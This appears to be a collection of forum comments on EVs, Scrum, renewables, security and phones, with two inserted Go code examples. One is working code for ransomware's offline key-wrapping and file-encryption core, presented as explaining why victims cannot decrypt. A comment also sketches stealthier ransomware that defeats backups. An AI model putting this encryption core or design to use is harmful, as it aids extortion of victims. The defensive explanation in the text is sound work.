It could be worse. It wasn't that long ago when most electric cars looked like the i-MyEV, or little pods that looked cool at a "let's all go green" conference, but were just too ugly to take seriously. Tesla and others have at least made electric vehicles look decent, and though definitely not as stylish as front-line vehicles, good enough for a daily driver. Tesla also made electric vehicles into decent performance vehicles.
Yep, already forced to do that with Thunderbird.
I wish they would at least offer and support them here in the US. Not everyone needs a flagship Android phone.
Oh, and they should have some method for a bootloader unlock.
I don't get how Scrum even works. The last couple of places I worked had daily standup meetings which were at least 1-2 hours, and in one company's case, 4-6 hours. Every. Single. Workday. Plus, the meetings didn't do anything other than let the same lazy trolls keep stirring the pot. The PM would go around and ask what people did, and the same people would be wailing and saying that they were blocked by so-and-so, so they cannot do any work today. The person who was supposedly blocking then had to defend themselves or else be called out for wasting people's time. Even if it was an IT person who was waiting for a dev to actually put code into a test environment before it would go into production, the IT person would have to defend why they don't just allow the devs free rein to put their code in the production environment whenever the dev feels like it to save time. The longer Scrum meetings would leave everyone burned out, and the few hours remaining of the day usually consisted of a late, late lunch, maybe a few tickets updated, and that was it for the day.
There used to be an app on Android called TextSecure, and another app called RedPhone. It was nice because both offered end to end encryption for messages and calls. The app even stored incoming/outgoing texts with encryption, so if the phone was unlocked, the messages were still protected.
Skype or Skype for Business?
Skype for Business seems to be doing quite well as messaging/voice for the enterprise, especially if an organization is heavily invested in O365.
The fact they bothered admitting a breach happened is a lot better than most companies. I personally would go elsewhere, because Duo and LastPass have stood the test of time, but with the fact that "security has no ROI" is a core motto in a lot of places, just admitting it is better than nothing.
I agree with this. The invisible hand, which is popular with the current mindset in the Executive/Judicial/Legislative branches, is definitely giving a middle finger to fossil fuels and nuclear:
1: Solar, the cat is out of the bag. It is becoming more economical to have, rather than not. Especially with Tesla's roof and TeslaWall offerings.
2: Even with the EPA hamstrung, people don't like lignite coal plants, and will protest them.
3: The era of the SUV is behind us here in the US. Yes, you see the occasional Tahoe, but people are going for Lexus RX models or other CUVs. People know that a gas crunch can come at any time. Priuses are still selling like hotcakes. Even in the rural, banjo country areas, because there is so much distance to travel, higher fuel economy cars are desired.
4: Electric cars are advancing. Even the hayseeds would love a 1 ton pickup that has max torque at 0 RPMs, and the ability to have an inverter for 5-10k watts for a welder or other power tools for the secluded parts of a farm/ranch, and be recharged from a plug. Upkeep needs for an electric vehicle are minimal. No real oil changes needed, for example.
5: Nuclear is all but dead. It would have been viable, but with contractors and sub-contractors who can't even ground a showerhead, the attitude of "let's cut corners, get our golden parachutes, and let others deal with it" killed the technology cold.
Yep, part of what the company was selling was security. They knew they were going to be a big fat target, with a lot of eggs in their basket. I can't fault them, because at least they admitted the breach. However, they should consider better encryption mechanisms. LastPass has been attacked a few times, but they have weathered the storm.
It might be that they need to re-architect their setup, with defense in depth.
The move to renewables is going to happen no matter what the politicos do. Most Americans know that it wouldn't take much for gas prices to go through the roof, especially if Iran decides to mine the Strait of Hormuz again. Even the board members with Exxon-Mobil want something better, just because even with fracking and oil expansion, they know the handwriting is on the wall there, especially with Russia and China's ever expanding claims of territory.
As for coal, we have long since passed peak coal. Most coal plants use lignite coal, which is the worst (in purity and energy output) type of coal there is, just because the good stuff has already been burned up. With environmental costs going up (even regardless of the current administration), coal is definitely on its way out in the US.
Plus, ignoring the base/peak factor, solar is very cheap to install and maintain. Upkeep for fixed-axis panels is very minimal. Even though solar requires a lot more area than other energy sources, the fact that it is "set up and forget" gives it a great advantage over time.
Yes, the US may leave the Paris Accord... but in reality, nothing will change. Cities are already leading the way, and the invisible hand is definitely giving the middle finger to fossil fuels in general.
I can see that. With traffic now, there isn't a need for 2 second 0-60 times. What is needed is fuel economy, being able to handle being stopped and using as little fuel as possible, and being comfortable to handle the two hour commute caused by a jack-knifed semi or some drunk who flipped their vehicle.
Horsepower has improved since the 1990s. The days of a Geo Metro or Mazda GLC holding up an entire line of traffic on a highway merge are long gone. Almost any car these days can merge safely onto US roads, and if it doesn't... that is the driver's error. We really don't need more HP, but a focus on creature comforts, reliability, and fuel economy. Cheap gas isn't going to last (it can be gone in hours, especially if Iran decides its time to mine the Strait of Hormuz again, or Daesh knocks out a refinery.) Hybrid cars bring the ability to use grid power (here in the US, that can come from biomass, solar, coal, nuclear, wind, or the hot air over DC.), reducing the need for fossil fuels specifically.
With commute times getting longer, and cities uninterested in expanding roads, it might be wise to consider autonomous cars like pop-top campervans. Hop in the vehicle, then take a shower and eat while it takes you to work, similar with the commute home. For longer trips, it would be useful because with automatic refueling, one could let the vehicle drive 24/7, and if you don't feel like stopping for something, you can just do a trip fairly quickly, no having to stop at a hotel for the night.
That wouldn't be too bad. I'd wind up just buying more Ford shares as a stock to keep and hold.
The thing about ransomware is that it doesn't need to fight with SELinux, nor escalate to root, to cause damage. It just needs enough access to read/write the user's files, which most web browsers provide. Even having an Internet connection isn't needed, since ransomware can bundle a public key with which it can encrypt an individualized ephemeral private key, then use the public key from that ephemeral keypair to encrypt all files.
Ransomware is part of a perfect storm. So many companies don't bother with security. Individuals don't care or don't bother. With the lack of consumer-tier tape drives and optical drives of a decent capacity, backup drives and cloud-synced storage are easy pickings for deletion. Not many end users really care to use a program like Mozy, Carbonite, or CrashPlan.
Windows also has the pressure of organizations, even governments, trying to find security holes in it. Extremely well-heeled groups who have lots of cash to spend on reverse-engineering every single part of the OS. Any OS under this much scrutiny will have holes found in it, just because the gains in finding a remote exploit are just so extreme. Someone finding a way to have something run as SYSTEM that a web browser picks up can become a billionaire in a heartbeat.
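The offline key handling described in the ransomware post above, as an added example that is not part of the original post or of any real malware: an operator public key is bundled, a fresh per-victim keypair is generated on the host, the victim private key is encrypted to the operator key, and every file is encrypted to the victim public key. Because public-key encryption alone cannot cover arbitrary-length files, this example generalizes the post's description by using the same ECIES-style hybrid step (X25519 plus AES-GCM) at both levels; the curve choice, the SHA-256 key derivation, the in-memory "files" and the sample content are all assumptions made for the example. The point for a responder is the last function: holding everything left on disk, there is no path to plaintext without the operator's private key.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/ecdh"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"io"
)

var curve = ecdh.X25519() // assumed curve; any ECDH curve would do

// aeadFor derives AES-256-GCM from an ECDH shared secret. SHA-256 is an assumed,
// minimal KDF; it is acceptable here only because each shared secret is single-use.
func aeadFor(shared []byte) (cipher.AEAD, error) {
	key := sha256.Sum256(shared)
	block, err := aes.NewCipher(key[:])
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// encryptTo is one hybrid step: fresh sender keypair, X25519 with the recipient's
// public key, AES-GCM. Layout: senderPub(32) || nonce(12) || ciphertext+tag.
func encryptTo(recipient *ecdh.PublicKey, plaintext []byte) ([]byte, error) {
	sender, err := curve.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	shared, err := sender.ECDH(recipient)
	if err != nil {
		return nil, err
	}
	g, err := aeadFor(shared)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, g.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	out := append(sender.PublicKey().Bytes(), nonce...)
	return g.Seal(out, nonce, plaintext, nil), nil
}

// decryptWith reverses encryptTo; only the recipient's private key can do this.
func decryptWith(recipient *ecdh.PrivateKey, blob []byte) ([]byte, error) {
	if len(blob) < 32+12 {
		return nil, errors.New("blob too short")
	}
	senderPub, err := curve.NewPublicKey(blob[:32])
	if err != nil {
		return nil, err
	}
	shared, err := recipient.ECDH(senderPub)
	if err != nil {
		return nil, err
	}
	g, err := aeadFor(shared)
	if err != nil {
		return nil, err
	}
	return g.Open(nil, blob[32:32+g.NonceSize()], blob[32+g.NonceSize():], nil)
}

// Artifacts is everything left on the host. None of it yields plaintext without
// the operator's private key, which never touches the machine.
type Artifacts struct {
	WrappedVictimPriv []byte            // per-victim private key, encrypted to the bundled operator key
	Files             map[string][]byte // each file encrypted to the per-victim public key
}

// NewOperatorKey is the key the operator keeps; only its public half is bundled.
func NewOperatorKey() (*ecdh.PrivateKey, error) { return curve.GenerateKey(rand.Reader) }

// Encrypt is the offline flow: the only inputs are the bundled operator public key
// and the files, so no network contact is needed before the damage is done.
func Encrypt(operatorPub *ecdh.PublicKey, files map[string][]byte) (*Artifacts, error) {
	victim, err := curve.GenerateKey(rand.Reader) // fresh keypair per infection
	if err != nil {
		return nil, err
	}
	a := &Artifacts{Files: map[string][]byte{}}
	if a.WrappedVictimPriv, err = encryptTo(operatorPub, victim.Bytes()); err != nil {
		return nil, err
	}
	for name, content := range files {
		if a.Files[name], err = encryptTo(victim.PublicKey(), content); err != nil {
			return nil, err
		}
	}
	return a, nil // the victim private key is discarded here; only its wrapped form remains
}

// Recover is the operator-side path: operator key -> victim key -> files.
// With any other key the first step fails on the GCM tag, so nothing downstream runs.
func Recover(operatorPriv *ecdh.PrivateKey, a *Artifacts) (map[string][]byte, error) {
	raw, err := decryptWith(operatorPriv, a.WrappedVictimPriv)
	if err != nil {
		return nil, err
	}
	victim, err := curve.NewPrivateKey(raw)
	if err != nil {
		return nil, err
	}
	out := map[string][]byte{}
	for name, body := range a.Files {
		if out[name], err = decryptWith(victim, body); err != nil {
			return nil, err
		}
	}
	return out, nil
}
```

Run Encrypt with a key from NewOperatorKey, then try Recover with a different key: it fails at the wrapped victim key, which is why memory forensics (catching the victim private key or the per-file session keys before they are discarded) is the only host-side recovery angle, and why backups matter more than decryptors.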
I really wish phones offered container or VM functionality. That way, I can keep sets of contacts separate, and keep work stuff separate from home stuff. Not hard to do, because the ARM CPU offers "worlds" which are essentially containers... but tend to not be used.
There used to be an app called RootCloak that worked on the XPosed framework, which when given an application list, would prevent a program from seeing if SuperSU was present or a su binary was installed in the usual directories. However, both the XPosed framework and RootCloak have not been updated for any new release of Android. I used to use this to allow SoftCard to run ages ago.
I would argue that biometrics are a class in themselves. Essentially a checkbox. For authentication, you have your userID (the object that is asking for authentication.) You have the password (something you know.) You have a 2FA code (something you possess), and a fingerprint (something you are.) Sometimes, with geo-location, one can add somewhere you are.
Does it increase security? It is a security factor. Is it worth it over something like Duo or a PIN on the HID card reader? Depends on what is being secured. Something high value like Lower Elbonia's secret sauce would probably need to have the additional factor in security. However, even a midsize corporation likely wouldn't be needing biometrics for physical access since they likely wouldn't be targeted.
Even with this in mind, if someone is wanting in that bad in a place that biometrics are used, there should be duress codes or other mechanisms in play, otherwise someone with the cheap 9mm from a drug dealer will be able to "bypass" all physical authentication pretty easily.
I am waiting for the generation of ransomware which installs a shim driver that transparently encrypts documents, but allows the user to access them for a certain period of time (so all backups in 30-90 days are useless), then at a date/time, purges the keys, and springs the trap.
I would say that these days, I'd consider a much longer backup rotation with snapshots kept for years just in case.
I also would look at a "pull" backup mechanism, a client that the server contacts. That way, unlike backing up to a share, there is no backup share that could be destroyed.
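The longer rotation argued for above, as an added example that is not part of the original post: a retention policy that keeps the newest snapshot from each of the last N days, ISO weeks, months and years, so that a document silently re-encrypted 90 days before the trap springs still has clean copies in the monthly and yearly sets. The pruning rule (walk newest to oldest per granularity, keep the first snapshot seen in each new period), the policy numbers, the 2017 "today" and the constructed two-year daily history are all assumptions made for the example. On a pull-based server this runs against the server's own store, where the backed-up host cannot reach it.

```go
package main

import (
	"fmt"
	"sort"
	"time"
)

// Policy is how many distinct periods to retain at each granularity (assumed shape).
type Policy struct {
	Daily, Weekly, Monthly, Yearly int
}

// period labels the calendar bucket a snapshot falls in for one rule.
func period(t time.Time, rule string) string {
	switch rule {
	case "daily":
		return t.Format("2006-01-02")
	case "weekly":
		y, w := t.ISOWeek()
		return fmt.Sprintf("%d-W%02d", y, w)
	case "monthly":
		return t.Format("2006-01")
	default: // yearly
		return t.Format("2006")
	}
}

// Prune decides which snapshots survive. For each rule it walks newest to oldest
// and keeps the first snapshot seen in each new period until the rule's count is
// met; a snapshot kept by any rule is kept. Both slices come back newest first.
func Prune(snaps []time.Time, p Policy) (keep, drop []time.Time) {
	sorted := append([]time.Time(nil), snaps...)
	sort.Slice(sorted, func(i, j int) bool { return sorted[i].After(sorted[j]) })
	kept := map[int64]bool{} // keyed on Unix seconds so equal instants compare equal
	rules := []struct {
		name string
		n    int
	}{{"daily", p.Daily}, {"weekly", p.Weekly}, {"monthly", p.Monthly}, {"yearly", p.Yearly}}
	for _, r := range rules {
		seen := map[string]bool{}
		for _, s := range sorted {
			if len(seen) >= r.n {
				break // this rule has its quota of periods
			}
			if b := period(s, r.name); !seen[b] {
				seen[b] = true
				kept[s.Unix()] = true
			}
		}
	}
	for _, s := range sorted {
		if kept[s.Unix()] {
			keep = append(keep, s)
		} else {
			drop = append(drop, s)
		}
	}
	return keep, drop
}

// DailySnapshots builds a constructed history: one snapshot per day ending at now.
func DailySnapshots(now time.Time, days int) []time.Time {
	out := make([]time.Time, days)
	for i := range out {
		out[i] = now.AddDate(0, 0, -i)
	}
	return out
}

func main() {
	now := time.Date(2017, 6, 30, 0, 0, 0, 0, time.UTC) // constructed "today"
	policy := Policy{Daily: 14, Weekly: 8, Monthly: 24, Yearly: 5}
	keep, drop := Prune(DailySnapshots(now, 730), policy)
	fmt.Printf("keep %d, drop %d, oldest kept %s\n",
		len(keep), len(drop), keep[len(keep)-1].Format("2006-01-02"))
}
```

With the constructed two-year history the monthly rule alone reaches back 24 months, so a 90-day dwell time before the keys are purged still leaves more than twenty clean monthly copies of every document; the cost is 42 retained snapshots out of 730, which is what makes a years-long rotation affordable.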
Even smaller shops tend to have the VoIP stuff on a separate VLAN, just for QoS purposes, to ensure that a doctor calling in a prescription for Prozium or Joy will not get dropped.
It would be interesting to see how this attack happened. A misconfigured AD forest could have allowed for brute-forcing a DA/EA account. Especially if there is no protection against brute force [1]. A lack of physical security could have allowed someone to boot a DC and crack an admin account.
In any case, why wasn't AppLocker running? This would have stopped this attack cold.
[1]: Ideally, accounts connected to users should have some timeout, even if it is 1-3 minutes. Service accounts should have an obnoxiously long (30+ characters) password. For local admin accounts, LAPS is a must.
Oh, there is always the, "Solar panels and wind turbines require more energy to be made than they gain back in their lifetime", argument. I see that popping up often as well.
VirtualBox is also great for working with Vagrant tasks, so that developers not only have the code to build/test, but also the actual environment the code runs in. This way, the guy with the ton of oddball applications, including an instance of Bonzi Buddy running in a W98 VM, gets the same results as everyone else.
The problem with hacking is that a lot of companies have the "security has no ROI" attitude. Last year, when I interviewed at one place (and definitely didn't take the offer), the CxO gave me the song and dance about "only person that profits from a lock is the lock maker", and when I asked what they would do in case of a breach, the response was, "we will call Accenture and let their world class professionals fix it."
With an attitude like that, it is surprising breaches don't happen more often in the private sector. The problem is that until there is an actual reason, and something that makes top brass actually value security, it won't happen. The -only- thing that has worked is PCI-DSS, because ignoring that hits businesses squarely in the pocketbook.
Apple? I like macOS for bread and butter computing, but I won't be destroyed if I wind up using a Dell or Lenovo.
Microsoft? There isn't much out that will scale as well as AD, so perhaps someone (Novell?) would put out a good LDAP offering that can handle things. Other than that, a good Puppet infrastructure could replace SCCM.
Amazon? Azure and OpenStack items could replace AWS, and someone could make an API interface to map all AWS calls to the other cloud providers.
Facebook? Easiest to replace. If they disappeared, G+, VK, WeChat, could step in. Eventually MS or another big company would fill that gap with a very usable offering.
Google? I'd say the hardest to replace, but the search engine could be replaced with Bing, the cloud services with AWS or Azure, Gmail with office.com, the Play Store with Amazon's Android store, and perhaps MS could make a variant or fork of AOSP.
The real company that would be a pain to replace would be ARM, even though they don't make any chips themselves.
What should be done is to create autonomous-only intersections to start off with. Since the first mention of self-driving cars, having intersections where vehicles could speed up or slow down to allow crossing at full speed has looked like a way to allow for fast travel without having to do expensive flyovers... just a four way intersection, perhaps with some mechanism to handle leftbound (rightbound in the UK) traffic. Then go from there and expand it to other places.
The ideal is to have a phone that doesn't need a case to survive a drop or two. I had an iPhone 4, and it stayed intact because from day 1, it lived in an Otterbox case.
With the engineering needs, such as heat dissipation, having larger, thinner phones is just natural phone evolution. Because people want faster CPUs that require a larger heat sink, pretending that larger and more delicate phones are what customers want only makes sense. So, it isn't a surprise phones are getting more delicate.
I would say that for most smartphones, a case is a must. It doesn't have to be a big, clunky Otterbox Tank, but at least something that can absorb shock, guard against scratches from pocket oddments (sand, keys, caltrops), and also perhaps protect the ports from lint as well. If one sells their phones, it does help with resale value.